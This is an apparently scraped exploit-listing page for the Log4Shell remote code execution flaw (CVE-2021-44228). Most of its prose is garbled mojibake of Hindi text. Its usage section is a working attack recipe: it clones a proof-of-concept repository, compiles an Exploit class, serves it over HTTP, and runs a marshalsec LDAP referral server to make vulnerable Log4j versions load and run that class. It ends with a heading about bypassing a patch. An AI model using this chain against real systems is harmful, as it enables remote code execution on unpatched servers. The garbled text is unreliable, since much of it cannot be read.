## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KANNTHU-CVE-2021-44228-APACHE-LOG4J-RCE
# CVE-2021-44228(Apache Log4j рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрдЬреАрдХреНрдпреВрд╢рдия╝Й
> рд╕рднреА log4j-core рд╕рдВрд╕реНрдХрд░рдг >=2.0-beta9 рдФрд░ <=2.14.1
1.x рдХреЗ рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ рдЕрдиреНрдп рдХрдордЬреЛрд░рд┐рдпрд╛рдБ рд╣реИрдВ, рд╣рдо рдЕрдиреБрд╢рдВрд╕рд╛ рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рдЖрдк рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ рдЕрдкрдбреЗрдЯ рдХрд░реЗрдВред
рд╕реБрд░рдХреНрд╖рд╛ рд╕рд▓рд╛рд╣рдХрд╛рд░ / рдмреБрд▓реЗрдЯрд┐рди Log4Shell (CVE-2021-44228) рд╕реЗ рдЬреБрдбрд╝реЗ
### рдЙрдкрдпреЛрдЧ:
root@kitploit:~
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
рдЕрдВрдд рдореЗрдВ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдЪрд▓рд╛рдПрдБ, рдЖрдк рдЕрдкрдиреЗ рд╕реНрдерд╛рдиреАрдп рд╕реЗ рдХреИрд▓рдХреБрд▓реЗрдЯрд░ рджреЗрдЦреЗрдВрдЧреЗред
Tips:
> рд╡рд░реНрддрдорд╛рди Java рд╕рдВрд╕реНрдХрд░рдг рдкрд░ рднрд░реЛрд╕рд╛ рди рдХрд░реЗрдВ рдХрд┐ рд╡рд╣ рдЖрдкрдХреЛ рдмрдЪрд╛рдПрдЧрд╛ред Log4j рдХреЛ рдЕрдкрдбреЗрдЯ рдХрд░реЗрдВ (рдпрд╛ JNDI lookup рд╣рдЯрд╛рдПрдБ)ред рд╡рд┐рд╕реНрддрд╛рд░ рдХреЛ рдЕрдХреНрд╖рдо рдХрд░реЗрдВ (рд╡реИрд╕реЗ рднреА рдпрд╣ рдХрд╛рдлреА рдмреБрд░рд╛ рд╡рд┐рдЪрд╛рд░ рд▓рдЧрддрд╛ рд╣реИ)ред
### rc1 рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░реЗрдВ